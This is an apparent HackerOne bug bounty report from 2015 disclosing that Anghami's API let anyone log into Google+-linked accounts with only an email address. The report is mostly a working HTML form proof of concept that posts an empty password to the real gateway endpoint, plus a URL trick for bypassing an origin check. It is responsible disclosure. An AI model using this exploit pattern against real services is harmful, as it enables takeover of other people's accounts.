Anghami: [CRITICAL] Login To Any Account Linked With Google+ With Email Only

2015-09-01T15:08:44
ID H1:86504
Type hackerone
Reporter ibram
Modified 2015-10-02T23:54:35

Description

Hello, This is CRITICAL .. I Can Login To Any Account Linked With Google+ With Email Only And Without Password!!

PoC:

```html <form action="https://api.anghami.com/gateway.php" method="POST"> <input type="hidden" name="m" value="gop"> <input type="hidden" name="u" value="victim@email.com"> <!-- Victim's Email--> <input type="hidden" name="p" value=""> <input type="hidden" name="type" value="authenticate"> <input type="hidden" name="lang" value="en"> <input type="hidden" name="language" value="en">

<input type="submit"> </form> `` And To Make This PoC Work .. You Have To Follow The Same Bypass in My Previous Report [#86428](https://hackerone.com/reports/86428). If Your Page URL ishttp://localhost/login.htmlMake IT Look Likehttp://localhost/login.html?https://play.anghami.com/login`. Submit The Form .. And You'll Be In The Victim Account.

Please Let Me Know If You Need a Video To Help You Reproduce This Vulnerability.

Best Regards, Ebram Marzouk